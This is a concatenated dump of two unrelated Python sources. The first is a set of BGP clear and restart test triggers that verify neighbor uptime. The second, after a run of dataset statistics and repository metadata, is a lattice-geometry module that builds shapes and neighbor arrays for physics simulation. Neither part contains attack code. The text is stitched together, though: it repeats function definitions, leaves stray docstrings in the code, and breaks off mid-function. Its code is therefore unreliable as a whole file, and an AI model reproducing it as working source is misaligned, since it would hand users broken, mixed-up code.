                                 '(?P<vrf>.*)', 'neighbor', '(?P<neighbor>.*)',
                                 'up_time', '(.*)']],
                      'relation': '<',
                      'threshold_time': 'compare_time',
                      'ops': 'ops'}

    mapping = Mapping(requirements={'ops.bgp.bgp.Bgp':{
                          'requirements':[\
                              ['info', 'instance', '(?P<instance>.*)',
                               'vrf', '(?P<vrf>.*)','neighbor', '(?P<neighbor>.*)',
                               'session_state', 'established']],
                          'kwargs':{'attributes':['info']},
                          'exclude': exclude}},
                      verify_ops={'ops.bgp.bgp.Bgp':{
                          'requirements':[[partial(verify_clear_callable,
                                                   verify_func=CompareUptime.compare_uptime,
                                                   verify_func_args=verify_func_args)]],
                          'kwargs':{'attributes':['info']},
                          'exclude': exclude}},
                      num_values={'vrf':'all', 'instance':'all',
                                  'neighbor':'all'})
class TriggerClearBgpAll(TriggerClearBgp):
    """Alias trigger: identical behavior to TriggerClearBgp under a distinct name."""
class TriggerClearIpBgpSoft(TriggerClear):
    """Soft clear of BGP on every instance/vrf/neighbor.

    Pre-requirement: at least one neighbor with session_state 'established'.
    Post-verify: 'up_time' satisfies relation '>=' against 'compare_time' —
    a soft clear must NOT reset the session uptime.
    """

    # Argument with dynamic value for verify callable.
    # As the verify callable is re-used in multiple triggers with different
    # variable names, this dictionary maps
    # <expected argument name for callable>: <script argument name>
    verify_func_args={'r_obj': [['info', 'instance', '(?P<instance>.*)', 'vrf',
                                 '(?P<vrf>.*)', 'neighbor', '(?P<neighbor>.*)',
                                 'up_time', '(.*)']],
                      'relation': '>=',
                      'threshold_time': 'compare_time',
                      'ops': 'ops'}

    mapping = Mapping(requirements={'ops.bgp.bgp.Bgp':{
                          'requirements':[\
                              ['info', 'instance', '(?P<instance>.*)',
                               'vrf', '(?P<vrf>.*)','neighbor', '(?P<neighbor>.*)',
                               'session_state', 'established']],
                          'kwargs':{'attributes':['info']},
                          'exclude': exclude}},
                      verify_ops={'ops.bgp.bgp.Bgp':{
                          'requirements':[[partial(verify_clear_callable,
                                                   verify_func=CompareUptime.compare_uptime,
                                                   verify_func_args=verify_func_args)]],
                          'kwargs':{'attributes':['info']},
                          'exclude': exclude}},
                      num_values={'vrf':'all', 'instance':'all',
                                  'neighbor':'all'})
class TriggerClearBgpNeighbor(TriggerClear):
    """Clear a single BGP neighbor (num_values limits vrf/instance/neighbor to 1).

    Post-verify: 'up_time' < 'compare_time', i.e. the session was reset.
    """

    # Argument with dynamic value for verify callable.
    # As the verify callable is re-used in multiple triggers with different
    # variable names, this dictionary maps
    # <expected argument name for callable>: <script argument name>
    verify_func_args={'r_obj': [['info', 'instance', '(?P<instance>.*)', 'vrf',
                                 '(?P<vrf>.*)', 'neighbor', '(?P<neighbor>.*)',
                                 'up_time', '(.*)']],
                      'relation': '<',
                      'threshold_time': 'compare_time',
                      'ops': 'ops'}

    mapping = Mapping(requirements={'ops.bgp.bgp.Bgp':{
                          'requirements':[\
                              ['info', 'instance', '(?P<instance>.*)',
                               'vrf', '(?P<vrf>.*)','neighbor', '(?P<neighbor>.*)',
                               'session_state', 'established']],
                          'kwargs':{'attributes':['info']},
                          'exclude': exclude}},
                      verify_ops={'ops.bgp.bgp.Bgp':{
                          'requirements':[[partial(verify_clear_callable,
                                                   verify_func=CompareUptime.compare_uptime,
                                                   verify_func_args=verify_func_args)]],
                          'kwargs':{'attributes':['info']},
                          'exclude': exclude}},
                      num_values={'vrf':'1', 'instance':'1',
                                  'neighbor':'1'})
class TriggerClearBgpNeighborSoft(TriggerClear):
    """Soft clear of a single BGP neighbor.

    Post-verify: 'up_time' >= 'compare_time' — a soft clear must not reset
    the session uptime.
    """

    # Argument with dynamic value for verify callable.
    # As the verify callable is re-used in multiple triggers with different
    # variable names, this dictionary maps
    # <expected argument name for callable>: <script argument name>
    verify_func_args={'r_obj': [['info', 'instance', '(?P<instance>.*)', 'vrf',
                                 '(?P<vrf>.*)', 'neighbor', '(?P<neighbor>.*)',
                                 'up_time', '(.*)']],
                      'relation': '>=',
                      'threshold_time': 'compare_time',
                      'ops': 'ops'}

    mapping = Mapping(requirements={'ops.bgp.bgp.Bgp':{
                          'requirements':[\
                              ['info', 'instance', '(?P<instance>.*)',
                               'vrf', '(?P<vrf>.*)','neighbor', '(?P<neighbor>.*)',
                               'session_state', 'established']],
                          'kwargs':{'attributes':['info']},
                          'exclude': exclude}},
                      verify_ops={'ops.bgp.bgp.Bgp':{
                          'requirements':[[partial(verify_clear_callable,
                                                   verify_func=CompareUptime.compare_uptime,
                                                   verify_func_args=verify_func_args)]],
                          'kwargs':{'attributes':['info']},
                          'exclude': exclude}},
                      num_values={'vrf':'1', 'instance':'1',
                                  'neighbor':'1'})
class TriggerClearBgpNeighborIpv4(TriggerClear):
    """Clear a single IPv4 BGP neighbor (dotted-decimal address only).

    Post-verify: 'up_time' < 'compare_time', i.e. the session was reset.
    """

    # Argument with dynamic value for verify callable.
    # As the verify callable is re-used in multiple triggers with different
    # variable names, this dictionary maps
    # <expected argument name for callable>: <script argument name>
    verify_func_args={'r_obj': [['info', 'instance', '(?P<instance>.*)', 'vrf',
                                 '(?P<vrf>.*)', 'neighbor', '(?P<neighbor>.*)',
                                 'up_time', '(.*)']],
                      'relation': '<',
                      'threshold_time': 'compare_time',
                      'ops': 'ops'}

    mapping = Mapping(requirements={'ops.bgp.bgp.Bgp':{
                          'requirements':[
                              ['info', 'instance', '(?P<instance>.*)',
                               # raw string: \d and \. are regex escapes, not
                               # Python string escapes (fixes DeprecationWarning)
                               'vrf', '(?P<vrf>.*)','neighbor', r'(?P<neighbor>^[\d\.]+$)',
                               'session_state', 'established']],
                          'kwargs':{'attributes':['info']},
                          'exclude': exclude}},
                      verify_ops={'ops.bgp.bgp.Bgp':{
                          'requirements':[[partial(verify_clear_callable,
                                                   verify_func=CompareUptime.compare_uptime,
                                                   verify_func_args=verify_func_args)]],
                          'kwargs':{'attributes':['info']},
                          'exclude': exclude}},
                      num_values={'vrf':'1', 'instance':'1','neighbor':'1'})
class TriggerClearBgpNeighborIpv6(TriggerClear):
    """Clear a single IPv6 BGP neighbor (hex-and-colon address only).

    Post-verify: 'up_time' < 'compare_time', i.e. the session was reset.
    """

    # Argument with dynamic value for verify callable.
    # As the verify callable is re-used in multiple triggers with different
    # variable names, this dictionary maps
    # <expected argument name for callable>: <script argument name>
    verify_func_args={'r_obj': [['info', 'instance', '(?P<instance>.*)', 'vrf',
                                 '(?P<vrf>.*)', 'neighbor', '(?P<neighbor>.*)',
                                 'up_time', '(.*)']],
                      'relation': '<',
                      'threshold_time': 'compare_time',
                      'ops': 'ops'}

    mapping = Mapping(requirements={'ops.bgp.bgp.Bgp':{
                          'requirements':[
                              ['info', 'instance', '(?P<instance>.*)',
                               # raw string: \w and \: are regex escapes, not
                               # Python string escapes (fixes DeprecationWarning)
                               'vrf', '(?P<vrf>.*)','neighbor', r'(?P<neighbor>^[\w\:]+$)',
                               'session_state', 'established']],
                          'kwargs':{'attributes':['info']},
                          'exclude': exclude}},
                      verify_ops={'ops.bgp.bgp.Bgp':{
                          'requirements':[[partial(verify_clear_callable,
                                                   verify_func=CompareUptime.compare_uptime,
                                                   verify_func_args=verify_func_args)]],
                          'kwargs':{'attributes':['info']},
                          'exclude': exclude}},
                      num_values={'vrf':'1', 'instance':'1','neighbor':'1'})
class TriggerClearBgpNeighborSoftIpv4(TriggerClear):
    """Soft clear of a single IPv4 BGP neighbor.

    Post-verify: 'up_time' >= 'compare_time' — a soft clear must not reset
    the session uptime.
    """

    # Argument with dynamic value for verify callable.
    # As the verify callable is re-used in multiple triggers with different
    # variable names, this dictionary maps
    # <expected argument name for callable>: <script argument name>
    verify_func_args={'r_obj': [['info', 'instance', '(?P<instance>.*)', 'vrf',
                                 '(?P<vrf>.*)', 'neighbor', '(?P<neighbor>.*)',
                                 'up_time', '(.*)']],
                      'relation': '>=',
                      'threshold_time': 'compare_time',
                      'ops': 'ops'}

    mapping = Mapping(requirements={'ops.bgp.bgp.Bgp':{
                          'requirements':[
                              ['info', 'instance', '(?P<instance>.*)',
                               # raw string: \d and \. are regex escapes, not
                               # Python string escapes (fixes DeprecationWarning)
                               'vrf', '(?P<vrf>.*)','neighbor', r'(?P<neighbor>^[\d\.]+$)',
                               'session_state', 'established']],
                          'kwargs':{'attributes':['info']},
                          'exclude': exclude}},
                      verify_ops={'ops.bgp.bgp.Bgp':{
                          'requirements':[[partial(verify_clear_callable,
                                                   verify_func=CompareUptime.compare_uptime,
                                                   verify_func_args=verify_func_args)]],
                          'kwargs':{'attributes':['info']},
                          'exclude': exclude}},
                      num_values={'vrf':'1', 'instance':'1','neighbor':'1'})
class TriggerClearBgpNeighborSoftIpv6(TriggerClear):
    """Soft clear of a single IPv6 BGP neighbor.

    Post-verify: 'up_time' >= 'compare_time' — a soft clear must not reset
    the session uptime.
    """

    # Argument with dynamic value for verify callable.
    # As the verify callable is re-used in multiple triggers with different
    # variable names, this dictionary maps
    # <expected argument name for callable>: <script argument name>
    verify_func_args={'r_obj': [['info', 'instance', '(?P<instance>.*)', 'vrf',
                                 '(?P<vrf>.*)', 'neighbor', '(?P<neighbor>.*)',
                                 'up_time', '(.*)']],
                      'relation': '>=',
                      'threshold_time': 'compare_time',
                      'ops': 'ops'}

    mapping = Mapping(requirements={'ops.bgp.bgp.Bgp':{
                          'requirements':[
                              ['info', 'instance', '(?P<instance>.*)',
                               # raw string: \w and \: are regex escapes, not
                               # Python string escapes (fixes DeprecationWarning)
                               'vrf', '(?P<vrf>.*)','neighbor', r'(?P<neighbor>^[\w\:]+$)',
                               'session_state', 'established']],
                          'kwargs':{'attributes':['info']},
                          'exclude': exclude}},
                      verify_ops={'ops.bgp.bgp.Bgp':{
                          'requirements':[[partial(verify_clear_callable,
                                                   verify_func=CompareUptime.compare_uptime,
                                                   verify_func_args=verify_func_args)]],
                          'kwargs':{'attributes':['info']},
                          'exclude': exclude}},
                      num_values={'vrf':'1', 'instance':'1','neighbor':'1'})
class TriggerClearIpRouteCheckBgp(TriggerClearBgp):
    """Variant of TriggerClearBgp whose verification uses relation '>=':
    BGP neighbor 'up_time' must NOT have been reset by the clear.
    """

    # Argument with dynamic value for verify callable.
    # As the verify callable is re-used in multiple triggers with different
    # variable names, this dictionary maps
    # <expected argument name for callable>: <script argument name>
    verify_func_args={'r_obj': [['info', 'instance', '(?P<instance>.*)', 'vrf',
                                 '(?P<vrf>.*)', 'neighbor', '(?P<neighbor>.*)',
                                 'up_time', '(.*)']],
                      'relation': '>=',
                      'threshold_time': 'compare_time',
                      'ops': 'ops'}

    mapping = Mapping(requirements={'ops.bgp.bgp.Bgp':{
                          'requirements':[\
                              ['info', 'instance', '(?P<instance>.*)',
                               'vrf', '(?P<vrf>.*)','neighbor', '(?P<neighbor>.*)',
                               'session_state', 'established']],
                          'kwargs':{'attributes':['info']},
                          'exclude': exclude}},
                      verify_ops={'ops.bgp.bgp.Bgp':{
                          'requirements':[[partial(verify_clear_callable,
                                                   verify_func=CompareUptime.compare_uptime,
                                                   verify_func_args=verify_func_args)]],
                          'kwargs':{'attributes':['info']},
                          'exclude': exclude}},
                      num_values={'vrf':'all', 'instance':'all',
                                  'neighbor':'all'})
class TriggerClearBgpVpnv4UnicastVrfAll(TriggerClear):
    """Clear BGP vpnv4 unicast sessions across all vrfs.

    Pre-requirement: established sessions on a 'vpnv4 unicast' address family
    AND corresponding routes_per_peer entries (all_keys=True).
    Post-verify: routes_per_peer 'up_down' < 'compare_time' (peer restarted).
    """

    # Argument with dynamic value for verify callable.
    # As the verify callable is re-used in multiple triggers with different
    # variable names, this dictionary maps
    # <expected argument name for callable>: <script argument name>
    verify_func_args={'r_obj': [['routes_per_peer', 'instance', 'default',
                                 'vrf', '(?P<vrf>.*)','neighbor','(?P<neighbor>.*)',
                                 'address_family', '(?P<af>vpnv4 unicast.*)',
                                 'up_down', '(.*)']],
                      'relation': '<',
                      'threshold_time': 'compare_time',
                      'ops': 'ops'}

    mapping = Mapping(requirements={'ops.bgp.bgp.Bgp': {
                          'requirements': [ \
                              [['info', 'instance', '(?P<instance>.*)',
                                'vrf', '(?P<vrf>.*)', 'neighbor', '(?P<neighbor>.*)',
                                'address_family','(?P<af>(vpnv4 unicast).*)',
                                'session_state', 'established']],
                              [['routes_per_peer', 'instance', 'default',\
                                'vrf', '(?P<vrf>.*)','neighbor','(?P<neighbor>.*)',\
                                'address_family', '(?P<af>(vpnv4 unicast).*)','(.*)']]],
                          'all_keys': True,
                          'kwargs': {'attributes': ['routes_per_peer','info']},
                          # session counters churn across a clear; exclude them
                          'exclude': exclude + ['msg_sent','msg_rcvd','up_down','tbl_ver']}},
                      verify_ops={'ops.bgp.bgp.Bgp':{
                          'requirements':[[partial(verify_clear_callable,
                                                   verify_func=CompareUptime.compare_uptime,
                                                   verify_func_args=verify_func_args)]],
                          'kwargs':{'attributes': ['routes_per_peer','info']},
                          'exclude': exclude + ['msg_sent','msg_rcvd','up_down','tbl_ver']}},
                      num_values={'vrf': 'all','neighbor': 'all', 'af': 'all'})
class TriggerClearBgpVpnv6UnicastVrfAll(TriggerClear):
    """Clear BGP vpnv6 unicast sessions across all vrfs.

    Pre-requirement: established sessions on a 'vpnv6 unicast' address family
    AND corresponding routes_per_peer entries (all_keys=True).
    Post-verify: routes_per_peer 'up_down' < 'compare_time' (peer restarted).
    """

    # Argument with dynamic value for verify callable.
    # As the verify callable is re-used in multiple triggers with different
    # variable names, this dictionary maps
    # <expected argument name for callable>: <script argument name>
    verify_func_args={'r_obj': [['routes_per_peer', 'instance', 'default',
                                 'vrf', '(?P<vrf>.*)', 'neighbor', '(?P<neighbor>.*)',
                                 'address_family', '(?P<af>vpnv6 unicast.*)',
                                 'up_down', '(.*)']],
                      'relation': '<',
                      'threshold_time': 'compare_time',
                      'ops': 'ops'}

    mapping = Mapping(requirements={'ops.bgp.bgp.Bgp': {
                          'requirements': [ \
                              [['info', 'instance', '(?P<instance>.*)',
                                'vrf', '(?P<vrf>.*)', 'neighbor', '(?P<neighbor>.*)',
                                'address_family', '(?P<af>(vpnv6 unicast).*)',
                                'session_state', 'established']],
                              [['routes_per_peer', 'instance', 'default', \
                                'vrf', '(?P<vrf>.*)', 'neighbor', '(?P<neighbor>.*)', \
                                'address_family', '(?P<af>(vpnv6 unicast).*)', '(.*)']]],
                          'all_keys': True,
                          'kwargs': {'attributes': ['routes_per_peer','info']},
                          # session counters churn across a clear; exclude them
                          'exclude': exclude + ['msg_sent', 'msg_rcvd', 'up_down', 'tbl_ver']}},
                      verify_ops={'ops.bgp.bgp.Bgp':{
                          'requirements':[[partial(verify_clear_callable,
                                                   verify_func=CompareUptime.compare_uptime,
                                                   verify_func_args=verify_func_args)]],
                          'kwargs':{'attributes': ['routes_per_peer','info']},
                          'exclude': exclude + ['msg_sent','msg_rcvd','up_down','tbl_ver']}},
                      num_values={'vrf': 'all', 'neighbor': 'all', 'af': 'all'})
class TriggerClearIpBgpVrfAll(TriggerClear):
    """Clear IP BGP across all vrfs for ipv4 address families.

    Pre-requirement: established sessions (any AF) AND routes_per_peer
    entries for ipv4 address families (all_keys=True).
    Post-verify: routes_per_peer 'up_down' < 'compare_time' (peer restarted).
    """

    # Argument with dynamic value for verify callable.
    # As the verify callable is re-used in multiple triggers with different
    # variable names, this dictionary maps
    # <expected argument name for callable>: <script argument name>
    verify_func_args={'r_obj': [['routes_per_peer', 'instance', 'default',
                                 'vrf', '(?P<vrf>.*)', 'neighbor', '(?P<neighbor>.*)',
                                 'address_family', '(?P<af>ipv4.*)',
                                 'up_down', '(.*)']],
                      'relation': '<',
                      'threshold_time': 'compare_time',
                      'ops': 'ops'}

    mapping = Mapping(requirements={'ops.bgp.bgp.Bgp': {
                          'requirements': [ \
                              [['info', 'instance', '(?P<instance>.*)',
                                'vrf', '(?P<vrf>.*)', 'neighbor', '(?P<neighbor>.*)',
                                'address_family', '(?P<af>.*)',
                                'session_state', 'established']],
                              [['routes_per_peer', 'instance', '(?P<instance>.*)', \
                                'vrf', '(?P<vrf>.*)', 'neighbor', '(?P<neighbor>.*)', \
                                'address_family', '(?P<af>ipv4.*)', '(.*)']]],
                          'all_keys': True,
                          'kwargs': {'attributes': ['info','routes_per_peer']},
                          # session counters churn across a clear; exclude them
                          'exclude': exclude + ['msg_sent', 'msg_rcvd', 'up_down', 'tbl_ver']}},
                      verify_ops={'ops.bgp.bgp.Bgp':{
                          'requirements':[[partial(verify_clear_callable,
                                                   verify_func=CompareUptime.compare_uptime,
                                                   verify_func_args=verify_func_args)]],
                          'kwargs':{'attributes': ['info','routes_per_peer']},
                          'exclude': exclude + ['msg_sent','msg_rcvd','up_down','tbl_ver']}},
                      num_values={'vrf': 'all', 'neighbor': 'all', 'af': 'all'})
class TriggerRestartBgp(TriggerClear):
    """Restart BGP and verify sessions re-establish.

    Pre-requirement: established sessions AND the instance 'bgp_id'
    (both must match, all_keys=True; bgp_id is exposed to the script).
    Post-verify: neighbor 'up_time' < 'compare_time' (sessions restarted).
    """

    # Argument with dynamic value for verify callable.
    # As the verify callable is re-used in multiple triggers with different
    # variable names, this dictionary maps
    # <expected argument name for callable>: <script argument name>
    verify_func_args={'r_obj': [['info', 'instance', '(?P<instance>.*)', 'vrf',
                                 '(?P<vrf>.*)', 'neighbor', '(?P<neighbor>.*)',
                                 'up_time', '(.*)']],
                      'relation': '<',
                      'threshold_time': 'compare_time',
                      'ops': 'ops'}

    mapping = Mapping(requirements={'ops.bgp.bgp.Bgp': {
                          'requirements': [ \
                              ['info', 'instance', '(?P<instance>.*)',
                               'vrf', '(?P<vrf>.*)', 'neighbor', '(?P<neighbor>.*)',
                               'address_family', '(?P<af>.*)',
                               'session_state', 'established'],
                              ['info','instance','(?P<instance>.*)','bgp_id', '(?P<bgp_id>.*)']
                          ],
                          'all_keys': True ,
                          'kwargs': {'attributes': ['info']},
                          'exclude': exclude}},
                      verify_ops={'ops.bgp.bgp.Bgp':{
                          'requirements':[[partial(verify_clear_callable,
                                                   verify_func=CompareUptime.compare_uptime,
                                                   verify_func_args=verify_func_args)]],
                          'kwargs':{'attributes': ['info']},
                          'exclude': exclude}},
                      num_values={'vrf': 'all', 'instance': 'all', 'neighbor': 'all', 'bgp_id': 'all'})
| 59.214286
| 114
| 0.419783
| 2,000
| 26,528
| 5.4075
| 0.075
| 0.057698
| 0.050485
| 0.040222
| 0.905502
| 0.905502
| 0.898844
| 0.897642
| 0.897642
| 0.897642
| 0
| 0.002151
| 0.439196
| 26,528
| 447
| 115
| 59.346756
| 0.72481
| 0.144753
| 0
| 0.878205
| 0
| 0
| 0.252896
| 0.006456
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| false
| 0.003205
| 0.012821
| 0
| 0.141026
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 7
|
486cc2208dc9b5ba64b66938ab1d370515875e65
| 10,015
|
py
|
Python
|
modules/super_lattice.py
|
tbcole/majoranaJJ
|
dcf31f7786fa0a4874a940b7d8dcdd55f3921a46
|
[
"MIT"
] | null | null | null |
modules/super_lattice.py
|
tbcole/majoranaJJ
|
dcf31f7786fa0a4874a940b7d8dcdd55f3921a46
|
[
"MIT"
] | 2
|
2020-03-24T23:46:17.000Z
|
2020-04-19T20:29:08.000Z
|
modules/super_lattice.py
|
tbcole/majoranaJJ
|
dcf31f7786fa0a4874a940b7d8dcdd55f3921a46
|
[
"MIT"
] | 3
|
2020-04-30T08:48:12.000Z
|
2022-01-26T12:15:15.000Z
|
import numpy as np
from numpy import sqrt
class shapes:
    """Coordinate generators for 2D lattices.

    Each method returns an (N, 2) numpy float array `coor` where row n holds
    the (x, y) grid coordinates of lattice site n.
    """

    @staticmethod
    def _to_coor(CAx, CAy):
        """Pack parallel x/y coordinate lists into an (N, 2) array."""
        coor_arr = np.zeros((len(CAx), 2))
        coor_arr[:, 0] = CAx
        coor_arr[:, 1] = CAy
        return coor_arr

    @staticmethod
    def square(Nx, Ny):
        """Nx-by-Ny rectangular lattice; sites ordered so that n = i + Nx*j."""
        N = Nx * Ny
        coor = np.zeros((N, 2))
        for i in range(Nx):
            for j in range(Ny):
                n = i + Nx * j
                # x = i, y = j
                coor[n, 0] = i
                coor[n, 1] = j
        return coor

    @staticmethod
    def donut(R, r):
        """Disk with a hole: keep grid sites with r <= |pos| < R.

        The grid spans [-R, R] in both directions; returned coordinates are
        the non-negative grid indices (i, j), not the centered (x, y).
        """
        CAx = []
        CAy = []
        xmin = -R  # radius of disk
        ymin = -R
        for j in range(int(2 * R) + 1):
            for i in range(int(2 * R) + 1):
                x = xmin + i
                y = ymin + j
                # decide if (x, y) is inside the annulus
                r_ij = sqrt(x ** 2 + y ** 2)
                if r <= r_ij < R:
                    CAx.append(i)
                    CAy.append(j)
        return shapes._to_coor(CAx, CAy)

    @staticmethod
    def halfdisk(R):
        """Right half (x >= 0) of a disk of radius R (boundary included)."""
        CAx = []
        CAy = []
        xmin = -R
        ymin = -R
        # int(2*R) + 1 (instead of 2*R + 1) keeps this working for float R,
        # consistent with donut() above.
        for j in range(int(2 * R) + 1):
            for i in range(int(2 * R) + 1):
                x = xmin + i
                y = ymin + j
                if x >= 0 and sqrt(x ** 2 + y ** 2) <= R:
                    CAx.append(i)
                    CAy.append(j)
        return shapes._to_coor(CAx, CAy)

    @staticmethod
    def ibeam(xbase, xcut, y1, y2):
        """I-beam: full-width flanges of height y1 with a web of height y2;
        a notch of width xcut is removed from each side of the middle band."""
        CAx = []
        CAy = []
        ybase = int(2 * y1 + y2)
        for j in range(ybase + 1):
            for i in range(xbase + 1):
                in_web_band = y1 < j < y1 + y2
                in_notch = i < xcut or i > xbase - xcut
                if in_web_band and in_notch:
                    continue
                CAx.append(i)
                CAy.append(j)
        return shapes._to_coor(CAx, CAy)

    @staticmethod
    def cross(x1, x2, y1, y2):
        """Plus/cross shape: an (x1+2*x2) x (y1+2*y2) block with the four
        x2-by-y2 corner rectangles removed."""
        CAx = []
        CAy = []
        xbase = int(x1 + 2 * x2)
        ybase = int(y1 + 2 * y2)
        for j in range(ybase + 1):
            for i in range(xbase + 1):
                outside_mid_rows = j < y2 or j > y2 + y1
                if (i < x2 and outside_mid_rows) or (i > x1 + x2 and outside_mid_rows):
                    continue
                CAx.append(i)
                CAy.append(j)
        return shapes._to_coor(CAx, CAy)
""" Neighbor Arrays:
These neighbor arrays are implemented in such a way as to avoid double looping. This saves a significant amount of time in large unit cells, as can be tested in the majoranaJJ/time_tsts/[bound_arr, nbr_arr]
Defining nearest neighbor array
NN_arr is Nx4, the columns store the index of the 4 nearest neighbors for each
lattice site
Left: NN[n,0] = n-1
Above: NN[n,1] = n+Nx
Right: NN[n, 2] = n+1
Down NN[n, 3] = n-Nx
if there is no lattice site in nearest neighbor spot, value is -1
"""
def NN_Arr(coor):
    # NOTE(review): this definition is shadowed by the later NN_Arr defined
    # further down in this module — this copy is effectively dead code.
    # Builds the Nx4 nearest-neighbour index table (columns: left, above,
    # right, below; -1 = no neighbour). `ones` resolves at call time via the
    # `from numpy import ones` that appears later at module level.
    N = coor.shape[0]
    NN = -1*ones((N,4), dtype = 'int')
    xmax = max(coor[:, 0])
    ymax = max(coor[:, 1])
    Lx = xmax + 1
    Ly = ymax + 1  # NOTE(review): unused
    for i in range(N):
        xi = coor[i, 0]
        yi = coor[i, 1]
        # NOTE(review): guards like abs(xi - 1) >= 0 and abs(yi - 1) >= 0 are
        # always true because of the abs(); presumably edge checks were
        # intended — confirm against the cleaned-up NN_Arr below.
        if (i-1) >= 0 and abs(xi - 1) >= 0 and abs(xi - coor[i-1, 0]) == 1 and abs(yi - coor[i-1, 1]) == 0:
            NN[i, 0] = i - 1
        if (i+1) < N and abs(xi + 1) <= xmax and abs(xi - coor[i+1, 0]) == 1 and abs(yi - coor[i+1, 1]) == 0:
            NN[i, 2] = i + 1
        # neighbours above/below may be up to a full row away in the index
        for j in range(0, int(Lx)+1):
            if (i + j) < N and abs(yi + 1) <= ymax and abs(yi - coor[int(i + j), 1]) == 1 and abs(xi - coor[int(i + j), 0]) == 0:
                NN[i, 1] = i + j
            if (i - j) >= 0 and abs(yi - 1) >= 0 and abs(yi - coor[int(i - j), 1]) == 1 and abs(xi - coor[int(i - j), 0]) == 0:
                NN[i, 3]= i - j
    return NN
""" Periodic Boundary conditions
if statements:
if the x-coordinate of the ith lattice site is the minimum value, it must be on the edge of the unit cell and therefore has a nearest neighbor in the neighboring unit cell.
Ex: To find the lattice site that corresponds to the neighbor to the left in the neighboring unit cell, we know it will be at most the (i + xmax)th site. If we are given a perfect square, it is the (i + xmax)th site. In the case of the donut, this is not the case, so we search until we find the site that is at the same height as the ith site, and has an x-coordinate that is the maximum value. The other statements follow similar logic for other neighbors.
"""
def Bound_Arr(coor):
    # NOTE(review): an identical Bound_Arr is redefined later in this module,
    # shadowing this copy — effectively dead code; consider deleting one.
    # Builds the Nx4 periodic-boundary neighbour table: for edge sites, find
    # the wrap-around partner on the opposite edge at the same row/column.
    xmin = int(min(coor[:, 0]))
    ymin = int(min(coor[:, 1]))
    xmax = int(max(coor[:, 0]))
    ymax = int(max(coor[:, 1]))
    N = coor.shape[0]
    NNb = -1*ones((N,4), dtype = 'int') #stores the values of the coordinates of each periodic neighbor, -1 means no neighbor
    for i in range(N):
        x_index = coor[i, 0]
        y_index = coor[i, 1]
        if x_index == xmin:
            # left edge: wrap to the right-most site on the same row
            for j in range(i, N):
                y = coor[j, 1]
                x = coor[j, 0]
                if y == y_index and x == xmax:
                    NNb[i, 0] = j
                    break
        if y_index == ymax:
            # top edge: wrap to the bottom site in the same column
            for j in range(0, int(coor[i, 0]) + 1):
                x = coor[j, 0]
                y = coor[j, 1]
                if x == x_index and y == ymin:
                    NNb[i, 1] = j
                    break
        if x_index == xmax:
            # right edge: wrap to the left-most site on the same row
            for j in range(i, -1, -1):
                x = coor[j, 0]
                y = coor[j, 1]
                if y == y_index and x == xmin:
                    NNb[i, 2] = j
                    break
        if y_index == ymin:
            # bottom edge: wrap to the top site in the same column
            for j in range(N-1, int(coor[i, 0]), -1):
                x = coor[j, 0]
                y = coor[j, 1]
                if x == x_index and y == ymax:
                    NNb[i, 3] = j
                    break
    return NNb
from numpy import ones
""" Neighbor Arrays:
These neighbor arrays are implemented in such a way as to avoid double looping. This saves a significant amount of time in large unit cells, as can be tested in the majoranaJJ/time_tsts/[bound_arr, nbr_arr]
Defining nearest neighbor array
NN_arr is Nx4, the columns store the index of the 4 nearest neighbors for each
lattice site
Left: NN[n,0] = n-1
Above: NN[n,1] = n+Nx
Right: NN[n, 2] = n+1
Down NN[n, 3] = n-Nx
if there is no lattice site in nearest neighbor spot, value is -1
"""
def NN_Arr(coor):
    """Nearest-neighbour table for the lattice described by `coor`.

    Returns an Nx4 int array: column 0 = left (n-1), 1 = above, 2 = right
    (n+1), 3 = below.  -1 marks a missing neighbour.
    """
    site_count = coor.shape[0]
    nbr = -1 * ones((site_count, 4), dtype='int')
    width = int(max(coor[:, 0]) + 1)
    for idx in range(site_count):
        x0 = coor[idx, 0]
        y0 = coor[idx, 1]
        # left / right neighbours are adjacent in the site ordering
        if idx > 0 and (x0 - coor[idx - 1, 0]) == 1 and (y0 - coor[idx - 1, 1]) == 0:
            nbr[idx, 0] = idx - 1
        if idx + 1 < site_count and (x0 - coor[idx + 1, 0]) == -1 and (y0 - coor[idx + 1, 1]) == 0:
            nbr[idx, 2] = idx + 1
        # above / below may be up to one full row away in index space
        for step in range(width + 1):
            up = idx + step
            down = idx - step
            if up < site_count and (y0 - coor[up, 1]) == -1 and (x0 - coor[up, 0]) == 0:
                nbr[idx, 1] = up
            if down >= 0 and (y0 - coor[down, 1]) == 1 and (x0 - coor[down, 0]) == 0:
                nbr[idx, 3] = down
    return nbr
def NN_sqr(coor):
    """Nearest-neighbour table assuming a perfect square/rectangular lattice.

    Same layout as NN_Arr (left, above, right, below; -1 = none) but exploits
    the row-major ordering: vertical neighbours sit exactly one row-stride away.
    """
    site_count = coor.shape[0]
    table = -1 * ones((site_count, 4), dtype='int')
    stride = int(max(coor[:, 0]) + 1)  # sites per row
    for k in range(site_count):
        xk = coor[k, 0]
        yk = coor[k, 1]
        left, up, right, down = k - 1, k + stride, k + 1, k - stride
        if left >= 0 and (xk - coor[left, 0]) == 1:
            table[k, 0] = left
        if up < site_count and (yk - coor[up, 1]) == -1:
            table[k, 1] = up
        if right < site_count and (xk - coor[right, 0]) == -1:
            table[k, 2] = right
        if down >= 0 and (yk - coor[down, 1]) == 1:
            table[k, 3] = down
    return table
""" Periodic Boundary conditions
if statements:
if the x-coordinate of the ith lattice site is the minimum value, it must be on the edge of the unit cell and therefore has a nearest neighbor in the neighboring unit cell to the left which is equivalent to the right most site of the same y-value.
Ex: To find the lattice site that corresponds to the neighbor to the left in the neighboring unit cell, we know it will be at most the (i + xmax)th site. If we are given a perfect square, it is the (i + xmax)th site. In the case of the donut, this is not the case, so we search until we find the site that is at the same height as the ith site, and has an x-coordinate that is the maximum value. The other statements follow similar logic for other neighbors.
"""
def Bound_Arr(coor):
    """Periodic-boundary neighbour table.

    For each site on an edge of the unit cell, find the index of the
    wrap-around partner on the opposite edge (same row for left/right,
    same column for top/bottom).  -1 marks "no periodic neighbour".
    """
    xmin = int(min(coor[:, 0]))
    ymin = int(min(coor[:, 1]))
    xmax = int(max(coor[:, 0]))
    ymax = int(max(coor[:, 1]))
    site_count = coor.shape[0]
    # -1 means no periodic neighbour in that direction
